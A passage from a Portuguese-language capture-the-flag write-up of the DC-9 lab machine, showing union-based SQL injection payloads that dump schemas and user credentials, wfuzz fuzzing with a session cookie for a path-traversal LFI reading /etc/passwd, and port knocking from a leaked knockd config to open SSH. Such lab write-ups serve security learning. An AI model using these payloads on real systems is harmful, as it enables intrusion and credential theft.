tom<span class="token string">' union select '</span>a<span class="token string">','</span>b<span class="token string">','</span>c<span class="token string">','</span>d<span class="token string">','</span>e<span class="token string">','</span>f' <span class="token comment">-- -</span></span></span></span></code></pre><div id="https://www.notion.so/9fa492c67c064b299c65a274e6d6f8f5" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F34e04ff7-b9f3-49be-a5dc-3324e562c88a%2FUntitled.png?width=420&table=block&id=9fa492c6-7c06-4b29-9c65-a274e6d6f8f5"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F34e04ff7-b9f3-49be-a5dc-3324e562c88a%2FUntitled.png?width=420&table=block&id=9fa492c6-7c06-4b29-9c65-a274e6d6f8f5" style="width:420px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><pre id="https://www.notion.so/b13a1ea58d8444d488448ce2348a4d29" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token number">3</span> <span class="token operator">-</span> Informações gerais <span class="token keyword">do</span> banco
tom' <span class="token keyword">union</span> <span class="token keyword">select</span> @<span class="token variable">@datadir</span><span class="token punctuation">,</span><span class="token keyword">database</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>@<span class="token variable">@version</span><span class="token punctuation">,</span><span class="token keyword">user</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token keyword">system_user</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>@<span class="token variable">@hostname</span> <span class="token comment">-- -</span>
ID: <span class="token operator">/</span>var<span class="token operator">/</span>lib<span class="token operator">/</span>mysql<span class="token operator">/</span>
Name: Staff <span class="token number">10.3</span><span class="token number">.17</span><span class="token operator">-</span>MariaDB<span class="token operator">-</span><span class="token number">0</span><span class="token operator">+</span>deb10u1
Position: dbuser<span class="token variable">@localhost</span>
Phone <span class="token keyword">No</span>: dbuser<span class="token variable">@localhost</span>
Email: dc<span class="token operator">-</span><span class="token number">9</span></span></span></span></code></pre><pre id="https://www.notion.so/7605a68b52d04f8a8c856ecfcdaf56b6" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token number">4</span> <span class="token operator">-</span> Listando todas <span class="token keyword">as</span> tabelas de todos os bancos de uma vez só
tom' <span class="token keyword">union</span> <span class="token keyword">SELECT</span> <span class="token number">1</span><span class="token punctuation">,</span>group_concat<span class="token punctuation">(</span>table_schema<span class="token punctuation">,</span><span class="token string">":"</span><span class="token punctuation">,</span>table_name<span class="token punctuation">,</span><span class="token string">"<br/>"</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">,</span><span class="token number">4</span><span class="token punctuation">,</span><span class="token number">5</span><span class="token punctuation">,</span><span class="token number">6</span> <span class="token keyword">FROM</span> information_schema<span class="token punctuation">.</span><span class="token keyword">tables</span> <span class="token comment">-- -</span>
<span class="token punctuation">(</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">)</span>
<span class="token punctuation">,</span>information_schema:TRIGGERS
<span class="token punctuation">,</span></span></span><span class="SemanticString"><mark class="SemanticString__Fragment SemanticString__Fragment--HighlightedColor SemanticString__Fragment--ColorRed"><span>information_schema:USER_PRIVILEGES</span></mark></span><span class="SemanticString"><span>
<span class="token punctuation">,</span>information_schema:VIEWS
<span class="token punctuation">(</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">)</span>
<span class="token punctuation">,</span></span></span><span class="SemanticString"><mark class="SemanticString__Fragment SemanticString__Fragment--HighlightedColor SemanticString__Fragment--ColorRed"><span>Staff:StaffDetails</span></mark></span><span class="SemanticString"><span>
<span class="token punctuation">,</span></span></span><span class="SemanticString"><mark class="SemanticString__Fragment SemanticString__Fragment--HighlightedColor SemanticString__Fragment--ColorRed"><span>Staff:Users</span></mark></span><span class="SemanticString"><span>
<span class="token punctuation">,</span></span></span><span class="SemanticString"><mark class="SemanticString__Fragment SemanticString__Fragment--HighlightedColor SemanticString__Fragment--ColorRed"><span>users:UserDetails</span></mark></span></span></code></pre><pre id="https://www.notion.so/cf8ea66d7fe0442da4ff4329704dbcf0" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token number">5</span> <span class="token operator">-</span> Listando todas <span class="token keyword">as</span> colunas das tabelas que nos interessam
tom<span class="token string">' union SELECT 1,group_concat(table_schema,":",table_name,"->",column_name,"<br/>"),3,4,5,6 FROM information_schema.columns WHERE table_name = '</span>Users<span class="token string">' or table_name = '</span>UserDetails' <span class="token operator">or</span> table_name <span class="token operator">=</span> <span class="token string">"USER_PRIVILEGES"</span> <span class="token comment">-- - </span>
ID: <span class="token number">1</span>
Name: information_schema:USER_PRIVILEGES<span class="token operator">-</span><span class="token operator">></span>GRANTEE
<span class="token punctuation">,</span>information_schema:USER_PRIVILEGES<span class="token operator">-</span><span class="token operator">></span>TABLE_CATALOG
<span class="token punctuation">,</span>information_schema:USER_PRIVILEGES<span class="token operator">-</span><span class="token operator">></span>PRIVILEGE_TYPE
<span class="token punctuation">,</span>information_schema:USER_PRIVILEGES<span class="token operator">-</span><span class="token operator">></span>IS_GRANTABLE
<span class="token punctuation">,</span>Staff:Users<span class="token operator">-</span><span class="token operator">></span>UserID
<span class="token punctuation">,</span></span></span><span class="SemanticString"><mark class="SemanticString__Fragment SemanticString__Fragment--HighlightedColor SemanticString__Fragment--ColorRed"><span>Staff:Users<span class="token operator">-</span><span class="token operator">></span>Username</span></mark></span><span class="SemanticString"><span>
<span class="token punctuation">,</span></span></span><span class="SemanticString"><mark class="SemanticString__Fragment SemanticString__Fragment--HighlightedColor SemanticString__Fragment--ColorRed"><span>Staff:Users<span class="token operator">-</span><span class="token operator">></span>Password</span></mark></span><span class="SemanticString"><span>
<span class="token punctuation">,</span>users:UserDetails<span class="token operator">-</span><span class="token operator">></span>id
<span class="token punctuation">,</span>users:UserDetails<span class="token operator">-</span><span class="token operator">></span>firstname
<span class="token punctuation">,</span>users:UserDetails<span class="token operator">-</span><span class="token operator">></span>lastname
<span class="token punctuation">,</span></span></span><span class="SemanticString"><mark class="SemanticString__Fragment SemanticString__Fragment--HighlightedColor SemanticString__Fragment--ColorRed"><span>users:UserDetails<span class="token operator">-</span><span class="token operator">></span>username</span></mark></span><span class="SemanticString"><span>
<span class="token punctuation">,</span></span></span><span class="SemanticString"><mark class="SemanticString__Fragment SemanticString__Fragment--HighlightedColor SemanticString__Fragment--ColorRed"><span>users:UserDetails<span class="token operator">-</span><span class="token operator">></span>password</span></mark></span><span class="SemanticString"><span>
<span class="token punctuation">,</span>users:UserDetails<span class="token operator">-</span><span class="token operator">></span>reg_date
<span class="token number">3</span>
Position: <span class="token number">4</span>
Phone <span class="token keyword">No</span>: <span class="token number">5</span>
Email: <span class="token number">6</span></span></span></span></code></pre><pre id="https://www.notion.so/907acbaaf48c40369cc1bfe47d31d546" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token number">6</span> <span class="token operator">-</span> Verificando o conteú<span class="token keyword">do</span> da tabela Staff<span class="token punctuation">.</span>Users
tom<span class="token string">' union select 1,group_concat(Username,'</span><span class="token operator">=</span><span class="token string">',Password,'</span><span class="token operator"><</span>br<span class="token operator">/</span><span class="token operator">></span>'<span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">,</span><span class="token number">4</span><span class="token punctuation">,</span><span class="token number">5</span><span class="token punctuation">,</span><span class="token number">6</span> <span class="token keyword">from</span> Staff<span class="token punctuation">.</span>Users<span class="token comment">-- - </span>
ID: <span class="token number">1</span>
Name: </span></span><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><mark class="SemanticString__Fragment SemanticString__Fragment--HighlightedColor SemanticString__Fragment--ColorRed"><span>admin<span class="token operator">=</span><span class="token number">856</span>f5de590ef37314e7c3bdf6f8a66dc</span></mark></strong></span><span class="SemanticString"><span>
<span class="token number">3</span>
Position: <span class="token number">4</span>
Phone <span class="token keyword">No</span>: <span class="token number">5</span>
Email: <span class="token number">6</span></span></span></span></code></pre><div id="https://www.notion.so/d15f2aad92d649ac99b27a4f9e7960be" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Obtemos uma credencial de Admin com a senha que parece um hash. Colocando no </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://crackstation.net">crackstation.net</a></span><span class="SemanticString"> obtemos</span></span></p></div><div id="https://www.notion.so/9c11616f168c4530a683ea616f442233" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/0f950e132ba54f56a23ffac843e10a26" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F1746e99d-bc04-43c8-965d-4c6639543836%2FUntitled.png?width=2034&table=block&id=0f950e13-2ba5-4f56-a23f-fac843e10a26"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F1746e99d-bc04-43c8-965d-4c6639543836%2FUntitled.png?width=2034&table=block&id=0f950e13-2ba5-4f56-a23f-fac843e10a26" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><pre id="https://www.notion.so/65d30f37d64f47588b31caa3d67cdd23" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token number">7</span> <span class="token operator">-</span> Verificando o conteú<span class="token keyword">do</span> da tabela users<span class="token punctuation">.</span>UserDetails
tom<span class="token string">' union select 1,group_concat(Username,'</span><span class="token operator">=</span><span class="token string">',Password,'</span><span class="token operator"><</span>br<span class="token operator">/</span><span class="token operator">></span>'<span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">,</span><span class="token number">4</span><span class="token punctuation">,</span><span class="token number">5</span><span class="token punctuation">,</span><span class="token number">6</span> <span class="token keyword">from</span> users<span class="token punctuation">.</span>UserDetails<span class="token comment">-- - </span>
ID: <span class="token number">1</span>
Name:
</span></span><span class="SemanticString"><mark class="SemanticString__Fragment SemanticString__Fragment--HighlightedColor SemanticString__Fragment--ColorRed"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><span>marym<span class="token operator">=</span><span class="token number">3</span>kfs86sfd
<span class="token punctuation">,</span>julied<span class="token operator">=</span><span class="token number">468</span>sfdfsd2
<span class="token punctuation">,</span>fredf<span class="token operator">=</span><span class="token number">4</span>sfd87sfd1
<span class="token punctuation">,</span>barneyr<span class="token operator">=</span>RocksOff
<span class="token punctuation">,</span>tomc<span class="token operator">=</span>TC<span class="token operator">&</span>TheBoyz
<span class="token punctuation">,</span>jerrym<span class="token operator">=</span>B8m<span class="token comment">#48sd</span>
<span class="token punctuation">,</span>wilmaf<span class="token operator">=</span>Pebbles
<span class="token punctuation">,</span>bettyr<span class="token operator">=</span>BamBam01
<span class="token punctuation">,</span>chandlerb<span class="token operator">=</span>UrAG0D<span class="token operator">!</span>
<span class="token punctuation">,</span>joeyt<span class="token operator">=</span>Passw0rd
<span class="token punctuation">,</span>rachelg<span class="token operator">=</span>yN72<span class="token comment">#dsd</span>
<span class="token punctuation">,</span>rossg<span class="token operator">=</span>ILoveRachel
<span class="token punctuation">,</span>monicag<span class="token operator">=</span><span class="token number">3248</span>dsds7s
<span class="token punctuation">,</span>phoebeb<span class="token operator">=</span>smellycats
<span class="token punctuation">,</span>scoots<span class="token operator">=</span>YR3BVxxxw87
<span class="token punctuation">,</span>janitor<span class="token operator">=</span>Ilovepeepee
<span class="token punctuation">,</span>janitor2<span class="token operator">=</span>Hawaii<span class="token operator">-</span>Five<span class="token operator">-</span><span class="token number">0</span></span></strong></mark></span><span class="SemanticString"><span>
<span class="token number">3</span>
Position: <span class="token number">4</span>
Phone <span class="token keyword">No</span>: <span class="token number">5</span>
Email: <span class="token number">6</span></span></span></span></code></pre><div id="https://www.notion.so/008b3b60331048799722073c47fef8c6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Mais credenciais. </span></span></p></div><div id="https://www.notion.so/7b163c4a26714bf2ae4a5a3f0774d6ee" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Encurtando a conversa, usando a credencial de admin através do menu manage temos acesso completo a opção de Add Record que nos permite escrever no banco. A aplicação é vulnerável a XSS, mas não utilizamos ela para nada. </span></span></p></div><div id="https://www.notion.so/06e6ad7cb26b432687e423383345b201" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Neste momento, ainda estamos "encucado" com um possível LFI e com esse tanto de credenciais que nos faz imaginar que estão ai para podermos acessar aquela porta 22 que está bloqueada! Como já tinha lido sobre Port Knock um tempo atrás fiquei imaginando se tratar disso. Em alguns desafios vi que o atacante acaba de alguma forma tendo acesso a um pcap onde através da análise de tráfego dá para descobrir a sequência de portas a serem acessadas. </span></span></p></div><div id="https://www.notion.so/a723a9e2a9dd469689b6f5b64337ebbe" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Bem, vamos então tentar fazer um fuzz para descobrir qual seria o parâmetro que nos permitiria obter o LFI. Para isso utilizaremos o WFUZZ. </span></span></p></div><div id="https://www.notion.so/64d51d704c614dc8824c754cb1773da6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Como vimos que o LFI aparece apenas quando estamos logados, precisamos logar na aplicação com as credenciais de admin que obtivemos ou acessar o welcome.php diretamente para que a aplicação gere um cookie de autenticação. Usaremos esse cookie para o WFUZZ poder simular acessos como um usuário autenticado.</span></span></p></div><div id="https://www.notion.so/f6993bc3f4564be3badc41d9a71295b0" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/68c0ac825cba4f1daa12d8ebdd459c3c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/4a551a147af64d578040fcc97f1c5b4f" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F26c04e74-4c37-49ce-9eac-e6051ba01ccd%2FUntitled.png?width=511&table=block&id=4a551a14-7af6-4d57-8040-fcc97f1c5b4f"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F26c04e74-4c37-49ce-9eac-e6051ba01ccd%2FUntitled.png?width=511&table=block&id=4a551a14-7af6-4d57-8040-fcc97f1c5b4f" style="width:511px"/></a><figcaption><span class="SemanticStringArray"><span class="SemanticString">não autenticado. sem mensagem no rodapé</span></span></figcaption></figure></div><div id="https://www.notion.so/ae120ac9138d4569926aa641dc968d99" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fbe95a057-50fa-4bcc-8cec-2946da495d8e%2FUntitled.png?width=602&table=block&id=ae120ac9-138d-4569-926a-a641dc968d99"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fbe95a057-50fa-4bcc-8cec-2946da495d8e%2FUntitled.png?width=602&table=block&id=ae120ac9-138d-4569-926a-a641dc968d99" style="width:602px"/></a><figcaption><span class="SemanticStringArray"><span class="SemanticString">autenticado. mensagem no rodapé</span></span></figcaption></figure></div><div id="https://www.notion.so/d4d21b559a9d4deebeca19aa8d290aa5" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Para obter o cookie usaremos, depois de autenticado, a extensão para o firefox : </span><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">cookie quick manager</strong></span></span></p></div><div id="https://www.notion.so/4121419f561c4110977e1dcad97bea58" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/28af7a84e3704a11a6721784d260bc33" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Ff745d6e0-4083-48b8-8f5d-887621184b04%2FUntitled.png?width=1152&table=block&id=28af7a84-e370-4a11-a672-1784d260bc33"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Ff745d6e0-4083-48b8-8f5d-887621184b04%2FUntitled.png?width=1152&table=block&id=28af7a84-e370-4a11-a672-1784d260bc33" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/34d2f248fa7f4334bb306f16f465079d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Após clicar em Search Cookies for </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://example.com">example.com</a></span><span class="SemanticString"> , abrirá uma nova aba com o cookie. Só copiar!</span></span></p></div><div id="https://www.notion.so/832c65bd13c340028b42150e496a2644" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/7ef885e6afd546258d43b34a6eab81db" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fac8b60d6-b702-4ad3-adf6-9fe71776b5aa%2FUntitled.png?width=465&table=block&id=7ef885e6-afd5-4625-8d43-b34a6eab81db"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fac8b60d6-b702-4ad3-adf6-9fe71776b5aa%2FUntitled.png?width=465&table=block&id=7ef885e6-afd5-4625-8d43-b34a6eab81db" style="width:465px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/cf76076394844b0f97955e07fc975ed8" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Hora de usar o WFUZZ usando uma lista contendo os principais nomes utilizados como parâmetros</span></span></p></div><div id="https://www.notion.so/9a90ead654674d6ab10ffaef5f2109fc" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"> </span></span></p></div><pre id="https://www.notion.so/7ce20ebe75f846828ede353f6ca760f1" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span>wfuzz <span class="token operator">-</span>c <span class="token operator">-</span>z <span class="token keyword">file</span><span class="token punctuation">,</span><span class="token operator">/</span>usr<span class="token operator">/</span><span class="token keyword">share</span><span class="token operator">/</span>seclists<span class="token operator">/</span>Discovery<span class="token operator">/</span>Web<span class="token operator">-</span>Content<span class="token operator">/</span>burp<span class="token operator">-</span>parameter<span class="token operator">-</span>names<span class="token punctuation">.</span>txt <span class="token operator">-</span>b <span class="token string">"PHPSESSID=te7118tl328rqgpqu0t37vrdi3"</span> <span class="token operator">-</span>u http:<span class="token comment">//192.168.1.9/manage.php?FUZZ=../../../../../../../../../../../../etc/passwd</span></span></span></span></code></pre><div id="https://www.notion.so/e611153792be4e2db709ff43c31f6fb8" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/77e706a3865a4258bb03f705d152e17c" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fdc99dc5a-c9c9-4912-839b-fc93ef528772%2FUntitled.png?width=1294&table=block&id=77e706a3-865a-4258-bb03-f705d152e17c"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fdc99dc5a-c9c9-4912-839b-fc93ef528772%2FUntitled.png?width=1294&table=block&id=77e706a3-865a-4258-bb03-f705d152e17c" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/b923e01bb2be4414bc817476298bc653" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">O Wfuzz vai acesar a url informada substituindo a palavra FUZZ por cada nome encontrado na lista. Como esperado ele vai gerar um resultado igual para todas as tentativas onde o LFI não funcionar, neste caso, conforme obnserva-se da imagem acima, um resultado contendo 1341 caracteres. Para não ter que depois ficar rolando tela e procurando se houve ou não alguma mudança de comportamento no retorno, vamos usar o grep para mostrar apenas o que for diferente de 1341 Ch.</span></span></p></div><pre id="https://www.notion.so/6fc85ccdf3a94a8a84af19dec500e667" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span>wfuzz <span class="token operator">-</span>c <span class="token operator">-</span>z <span class="token keyword">file</span><span class="token punctuation">,</span><span class="token operator">/</span>usr<span class="token operator">/</span><span class="token keyword">share</span><span class="token operator">/</span>seclists<span class="token operator">/</span>Discovery<span class="token operator">/</span>Web<span class="token operator">-</span>Content<span class="token operator">/</span>burp<span class="token operator">-</span>parameter<span class="token operator">-</span>names<span class="token punctuation">.</span>txt <span class="token operator">-</span>b <span class="token string">"PHPSESSID=te7118tl328rqgpqu0t37vrdi3"</span> <span class="token operator">-</span>u http:<span class="token comment">//192.168.1.9/manage.php?FUZZ=../../../../../../../../../../../../etc/passwd | grep -v "1341 Ch"</span></span></span></span></code></pre><div id="https://www.notion.so/417da127e6ee49c3b3ce74e810ebcb9b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/79296f23f7ce4db4a9577b18407153a3" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fdef2e904-6ffa-4b08-aa53-a90edd3766fd%2FUntitled.png?width=1297&table=block&id=79296f23-f7ce-4db4-a957-7b18407153a3"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fdef2e904-6ffa-4b08-aa53-a90edd3766fd%2FUntitled.png?width=1297&table=block&id=79296f23-f7ce-4db4-a957-7b18407153a3" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/657957fde0834e0cac4a69cef132d31c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Parâmetro encontrado: file. </strong></span><span class="SemanticString"> Vamos testar no browser e ver se obtemos a resposta que esperamos.</span></span></p></div><div id="https://www.notion.so/7ac1731daf464f4b8ef0be2088288908" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/59610020b9114b6f93a3e600190fe1c4" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F9336fc49-cfe6-496f-9e80-f2a846b5fce7%2FUntitled.png?width=984&table=block&id=59610020-b911-4b6f-93a3-e600190fe1c4"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F9336fc49-cfe6-496f-9e80-f2a846b5fce7%2FUntitled.png?width=984&table=block&id=59610020-b911-4b6f-93a3-e600190fe1c4" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/4f56d5db4702407780e34229835ed3ce" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Conseguimos o LFI. Como podemos notar, no /etc/passwd constam os usuários que enumeramos lá em cima via SQLi, o que nos reforça a idéia de um acesso via SSH, afinal, não teria sentido um servidor com usuários mas sem nenhum tipo de acesso. </span></span></p></div><div id="https://www.notion.so/fd8635dd650f45aab9ab5a9b35c6bac3" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Neste ponto, com ajuda de um grupo de amigos, um deles deu a idéia de verificar se não existia um arquivo de configuração de um serviço chamado knockd, que geralmente é utilizado para Port Knock. vamos testar.</span></span></p></div><div id="https://www.notion.so/8de2eee8a2684b2893e852f2f852d731" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/1ea3aaf8637b43c48a603f46c7476cdc" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F6c875d6f-7369-4fa9-b69e-2d92260c9ccf%2FUntitled.png?width=989&table=block&id=1ea3aaf8-637b-43c4-8a60-3f46c7476cdc"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F6c875d6f-7369-4fa9-b69e-2d92260c9ccf%2FUntitled.png?width=989&table=block&id=1ea3aaf8-637b-43c4-8a60-3f46c7476cdc" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/90f3b3d37d714ba5be557409cb7c65b7" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"> Tá ai , arquivo de configuração encontrado e a sequência de portas a serem "batidas".</span></span></p></div><pre id="https://www.notion.so/c3027b341c264d0c89e49c1e3eb8a85e" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token punctuation">[</span>openSSH<span class="token punctuation">]</span>
sequence <span class="token operator">=</span> <span class="token number">7469</span><span class="token punctuation">,</span><span class="token number">8475</span><span class="token punctuation">,</span><span class="token number">9842</span>
seq_timeout <span class="token operator">=</span> <span class="token number">25</span>
command <span class="token operator">=</span> <span class="token operator">/</span>sbin<span class="token operator">/</span>iptables <span class="token operator">-</span>I INPUT <span class="token operator">-</span>s <span class="token operator">%</span>IP<span class="token operator">%</span> <span class="token operator">-</span>p tcp <span class="token comment">--dport 22 -j ACCEPT</span>
tcpflags <span class="token operator">=</span> syn
<span class="token punctuation">[</span>closeSSH<span class="token punctuation">]</span>
sequence <span class="token operator">=</span> <span class="token number">9842</span><span class="token punctuation">,</span><span class="token number">8475</span><span class="token punctuation">,</span><span class="token number">7469</span>
seq_timeout <span class="token operator">=</span> <span class="token number">25</span>
command <span class="token operator">=</span> <span class="token operator">/</span>sbin<span class="token operator">/</span>iptables <span class="token operator">-</span>D INPUT <span class="token operator">-</span>s <span class="token operator">%</span>IP<span class="token operator">%</span> <span class="token operator">-</span>p tcp <span class="token comment">--dport 22 -j ACCEPT</span>
tcpflags <span class="token operator">=</span> syn</span></span></span></code></pre><div id="https://www.notion.so/f54c824f91454dce9560fdbb04fe1dc1" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Vamos bater então na porta 7469, 8475 e 9842 para ver se vai abrir a porta 22, conforme regra do iptables. Podemos fazer isso com um hping3 ou com um knock , que vem no pacote do knockd ( </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">apt install knockd</code></span><span class="SemanticString"> )</span></span></p></div><pre id="https://www.notion.so/ad42a4d4bd8c4db588f99261ded99ddf" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span>root@kali:/home/kali# knock -v -d1000 192.168.1.9 7469 8475 9842
hitting tcp 192.168.1.9:7469
hitting tcp 192.168.1.9:8475
hitting tcp 192.168.1.9:9842
root@kali:/home/kali# nmap 192.168.1.9
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-10 17:04 EDT
Nmap scan report for example.com (192.168.1.9)
Host is up (0.00056s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
